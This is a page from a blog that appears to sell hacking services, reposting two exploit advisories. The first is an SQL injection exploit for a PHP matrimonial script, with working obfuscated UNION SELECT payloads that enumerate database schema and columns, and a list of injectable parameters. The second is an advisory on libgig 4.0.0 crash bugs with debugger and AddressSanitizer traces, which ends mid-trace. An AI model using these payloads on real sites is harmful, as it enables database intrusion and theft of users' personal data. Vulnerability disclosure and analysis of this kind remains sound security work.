Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863135722

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: Matrimonial Script - SQL Injection
# Dork: N/A
# Date: 22.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Demo: http://www.mscript.in/matrimonial-demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/viewprofile.php?id=[SQL]
#
# -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+-
#
# http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL]
#
# -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+-
#
# http://localhost/[PATH]/printprofile.php?id=[SQL]
# http://localhost/[PATH]/viewphoto.php?id=[SQL]
# http://localhost/[PATH]/advsearch_results.php?gender=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age1=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age2=[SQL]
# http://localhost/[PATH]/advsearch_results.php?religion=[SQL]
# http://localhost/[PATH]/advsearch_results.php?caste=[SQL]
# http://localhost/[PATH]/advsearch_results.php?ms=[SQL]
# http://localhost/[PATH]/advsearch_results.php?language=[SQL]
# http://localhost/[PATH]/advsearch_results.php?edu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?occu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?country=[SQL]
#
# Etc..
# # # # #
HireHackking 
================
Author : qflb.wu
===============


Introduction:
=============
https://www.linuxsampler.org/libgig/
libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data. 


Affected version:
=====
4.0.0


Vulnerability Description:
==========================
1.
the gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_null_pointer_dereference_1.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
    pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
2970                    if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
(gdb) bt
#0  0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
    pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
#1  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
    pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
    at gig.cpp:4404
#2  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#3  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#4  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#5  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
   0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>:je     0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
   0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>:xor    %edx,%edx
   0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>:mov    %eax,%esi
   0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>:mov    %rbx,%rdi
   0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>:mov    0x138(%r13),%r14
   0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>:callq  0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
=> 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>:mov    %rax,0x38(%r14)
   0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>:add    $0x1,%ebp
   0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>:add    $0x8,%r13
   0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>:cmp    %ebp,0x130(%rbx)
End of assembler dump.
(gdb) i r
rax            0x60ca906343312
rbx            0x614ce06376672
rcx            0x33
rdx            0x60a3006333184
rsi            0x00
rdi            0x6091606328672
rbp            0x00x0
rsp            0x7fffffffdcc00x7fffffffdcc0
r8             0x00
r9             0x22
r10            0x00
r11            0x246582
r12            0x6159506379856
r13            0x614ce06376672
r14            0x00
r15            0x00
rip            0x7ffff7bc07df0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
eflags         0x10246[ PF ZF IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
---Type <return> to continue, or q <return> to quit---
fs             0x00
gs             0x00
(gdb) 


ASAN:SIGSEGV
=================================================================
==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
AddressSanitizer can not provide additional info.
    #0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
==40516== ABORTING


POC:
libgig_4.0.0_null_pointer_dereference_1.gig
CVE:
CVE-2017-12950


2.
the gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(stack buffer overflow and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_stack_buffer_overflow.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2884
2884        table[0] = 0;
(gdb) bt
#0  0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2884
#1  0x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2054
#2  0x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
    this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>, 
    vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>, 
    vcfCutoffController=<optimized out>) at gig.cpp:2042
#3  0x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
    this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
    at gig.cpp:1617
#4  0x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
    this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
#5  0x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0, 
    pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
#6  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280, 
    pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
    at gig.cpp:4404
#7  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#8  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
---Type <return> to continue, or q <return> to quit---
    this=this@entry=0x609160) at gig.cpp:5378
#9  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
    (gdb) disassemble
Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
...
   0x00007ffff7bb8b27 <+2119>:mov    0x2e0(%rsp,%rdx,8),%rsi
   0x00007ffff7bb8b2f <+2127>:je     0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
   0x00007ffff7bb8b35 <+2133>:movzbl %bpl,%ebx
   0x00007ffff7bb8b39 <+2137>:cvtsi2sd %ebx,%xmm6
   0x00007ffff7bb8b3d <+2141>:movq   $0x0,(%rax)
=> 0x00007ffff7bb8b44 <+2148>:mov    0x8(%rsi),%edi
   0x00007ffff7bb8b47 <+2151>:lea    0x8(%rax),%rcx
---Type <return> to continue, or q <return> to quit---
   0x00007ffff7bb8b4b <+2155>:mov    0xc(%rsi),%r10d
   0x00007ffff7bb8b4f <+2159>:mov    $0x1,%edx
...
(gdb) i r
rax            0x60e0506348880
rbx            0x1420
rcx            0x7ffff7669760140737344083808
rdx            0xfe254
rsi            0x2f736c6f6f742f633419195767971393379
rdi            0x22
rbp            0x00x0
rsp            0x7fffffffd8600x7fffffffd860
r8             0x60dbc06347712
r9             0x4064
r10            0x7fffffffd9f0140737488345584
r11            0x7ffff7bbf601140737349678593
r12            0x44
r13            0x60d7706346608
r14            0x60c3a06341536
r15            0x60c3a06341536
rip            0x7ffff7bb8b440x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
eflags         0x10246[ PF ZF IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
---Type <return> to continue, or q <return> to quit---
fs             0x00
gs             0x00
(gdb) x/20x $rsi+0x8
0x2f736c6f6f742f6b:Cannot access memory at address 0x2f736c6f6f742f6b
(gdb) 
0x2f736c6f6f742f6f:Cannot access memory at address 0x2f736c6f6f742f6f
(gdb)


==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
READ of size 8 at 0x7ffc9ca05fa0 thread T0
    #0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
    #1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
    #2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
    #3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
    #4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
    #5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
  This frame has 2 object(s):
    [32, 40) 'name'
    [96, 104) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
Shadow bytes around the buggy address:
  0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
  0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
=>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
  0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
  0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==40504== ABORTING


POC:
libgig_4.0.0_stack_buffer_overflow.gig
CVE:
CVE-2017-12951


3.
the LoadString function in helper.h in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_null_pointer_dereference_2.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
LoadString (s="", ck=0x6095d0) at helper.h:148
148            if (str[len] == '\0') break;
(gdb) bt
#0  LoadString (s="", ck=0x6095d0) at helper.h:148
#1  DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865, 
    lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
#2  0x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
    at DLS.cpp:263
#3  0x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160, 
    Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
    at DLS.cpp:448
#4  0x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
    at DLS.cpp:1435
#5  0x00007ffff7bbab2e in gig::File::File (this=0x609160, 
    pRIFF=<optimized out>) at gig.cpp:5201
#6  0x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:70
(gdb) disassemble 
Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
   0x00007ffff7ba7f30 <+0>:push   %rbp
   0x00007ffff7ba7f31 <+1>:mov    %edi,%eax
   0x00007ffff7ba7f33 <+3>:mov    %rsi,%rdi
   0x00007ffff7ba7f36 <+6>:mov    %eax,%esi
   0x00007ffff7ba7f38 <+8>:push   %rbx
   0x00007ffff7ba7f39 <+9>:mov    %rdx,%rbx
   0x00007ffff7ba7f3c <+12>:sub    $0x8,%rsp
   0x00007ffff7ba7f40 <+16>:callq  0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
   0x00007ffff7ba7f45 <+21>:test   %rax,%rax
   0x00007ffff7ba7f48 <+24>:mov    %rax,%rbp
   0x00007ffff7ba7f4b <+27>:je     0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
   0x00007ffff7ba7f4d <+29>:mov    %rax,%rdi
   0x00007ffff7ba7f50 <+32>:callq  0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
   0x00007ffff7ba7f55 <+37>:mov    0xc(%rbp),%r10d
   0x00007ffff7ba7f59 <+41>:mov    %rax,%rsi
   0x00007ffff7ba7f5c <+44>:test   %r10d,%r10d
   0x00007ffff7ba7f5f <+47>:jle    0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
---Type <return> to continue, or q <return> to quit---
=> 0x00007ffff7ba7f61 <+49>:cmpb   $0x0,(%rax)
   0x00007ffff7ba7f64 <+52>:je     0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
   0x00007ffff7ba7f66 <+54>:mov    $0x1,%r9d
   0x00007ffff7ba7f6c <+60>:xor    %ecx,%ecx
   0x00007ffff7ba7f6e <+62>:jmp    0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
   0x00007ffff7ba7f70 <+64>:cmpb   $0x0,(%rsi,%r9,1)
   0x00007ffff7ba7f75 <+69>:lea    0x1(%r9),%r8
   0x00007ffff7ba7f79 <+73>:je     0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
   0x00007ffff7ba7f7b <+75>:mov    %r8,%r9
   0x00007ffff7ba7f7e <+78>:add    $0x1,%ecx
   0x00007ffff7ba7f81 <+81>:cmp    %r10d,%ecx
   0x00007ffff7ba7f84 <+84>:jne    0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
   0x00007ffff7ba7f86 <+86>:movslq %ecx,%rdx
   0x00007ffff7ba7f89 <+89>:mov    %rbx,%rdi
   0x00007ffff7ba7f8c <+92>:callq  0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
   0x00007ffff7ba7f91 <+97>:add    $0x8,%rsp
   0x00007ffff7ba7f95 <+101>:mov    %rbp,%rdi
   0x00007ffff7ba7f98 <+104>:pop    %rbx
   0x00007ffff7ba7f99 <+105>:pop    %rbp
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax            0x00
rbx            0x6092386328888
rcx            0x7ffff739f9f7140737341159927
rdx            0x7ffff5d9f000140737318088704
rsi            0x00
rdi            0x7ffff5d9f000140737318088704
rbp            0x6095d00x6095d0
rsp            0x7fffffffdd800x7fffffffdd80
r8             0xffffffff4294967295
r9             0x00
r10            0x100001a16777242
r11            0x247583
r12            0x6092206328864
r13            0x7fffffffdfa0140737488347040
r14            0x00
r15            0x6091a06328736
rip            0x7ffff7ba7f610x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
eflags         0x10202[ IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
---Type <return> to continue, or q <return> to quit---
fs             0x00
gs             0x00
(gdb)


ASAN:SIGSEGV
=================================================================
==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
AddressSanitizer can not provide additional info.
    #0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
    #1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
    #2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
    #3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
    #4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
    #5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
    #6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
    #7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
==41244== ABORTING


POC:
libgig_4.0.0_null_pointer_dereference_2.gig
CVE:
CVE-2017-12952


4.
the gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory write and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_invalid_memory_write.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
4445                RegionKeyTable[iKey] = pRegion;
(gdb) bt
#0  gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
    at gig.cpp:4445
#1  0x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0, 
    pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
    at gig.cpp:4409
#2  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#3  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#4  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#5  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble 
Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
   0x00007ffff7bba240 <+0>:xor    %eax,%eax
   0x00007ffff7bba242 <+2>:nopw   0x0(%rax,%rax,1)
   0x00007ffff7bba248 <+8>:movq   $0x0,0x80(%rdi,%rax,1)
   0x00007ffff7bba254 <+20>:add    $0x8,%rax
   0x00007ffff7bba258 <+24>:cmp    $0x400,%rax
   0x00007ffff7bba25e <+30>:jne    0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
   0x00007ffff7bba260 <+32>:mov    0x60(%rdi),%r9
   0x00007ffff7bba264 <+36>:mov    (%r9),%r8
   0x00007ffff7bba267 <+39>:cmp    %r9,%r8
   0x00007ffff7bba26a <+42>:je     0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
   0x00007ffff7bba26c <+44>:nopl   0x0(%rax)
   0x00007ffff7bba270 <+48>:mov    0x10(%r8),%rcx
   0x00007ffff7bba274 <+52>:movzwl 0x78(%rcx),%eax
   0x00007ffff7bba278 <+56>:movzwl 0x7a(%rcx),%esi
   0x00007ffff7bba27c <+60>:cmp    %esi,%eax
   0x00007ffff7bba27e <+62>:jg     0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
   0x00007ffff7bba280 <+64>:add    $0x1,%esi
   0x00007ffff7bba283 <+67>:nopl   0x0(%rax,%rax,1)
   0x00007ffff7bba288 <+72>:movslq %eax,%rdx
---Type <return> to continue, or q <return> to quit---
   0x00007ffff7bba28b <+75>:add    $0x1,%eax
   0x00007ffff7bba28e <+78>:cmp    %esi,%eax
=> 0x00007ffff7bba290 <+80>:mov    %rcx,0x80(%rdi,%rdx,8)
   0x00007ffff7bba298 <+88>:jne    0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
   0x00007ffff7bba29a <+90>:mov    (%r8),%r8
   0x00007ffff7bba29d <+93>:cmp    %r8,%r9
   0x00007ffff7bba2a0 <+96>:jne    0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
   0x00007ffff7bba2a2 <+98>:repz retq 
   0x00007ffff7bba2a4 <+100>:repz retq 
End of assembler dump.
(gdb) i r
rax            0x3fbd16317
rbx            0x60a1a06332832
rcx            0x60d5806346112
rdx            0x3fbc16316
rsi            0x420116897
rdi            0x60a1a06332832
rbp            0x7fffffffdd900x7fffffffdd90
rsp            0x7fffffffdd080x7fffffffdd08
r8             0x60e7406350656
r9             0x60b0f06336752
r10            0x7fffffffdad0140737488345808
r11            0x7ffff7bba240140737349657152
r12            0x00
r13            0x60a0c06332608
r14            0x60a9806334848
r15            0x60d5806346112
rip            0x7ffff7bba2900x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
eflags         0x10283[ CF SF IF RF ]
cs             0x3351
ss             0x2b43
ds             0x00
es             0x00
---Type <return> to continue, or q <return> to quit---
fs             0x00
gs             0x00
(gdb)


ASAN:SIGSEGV
=================================================================
==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
    #1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
    #2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
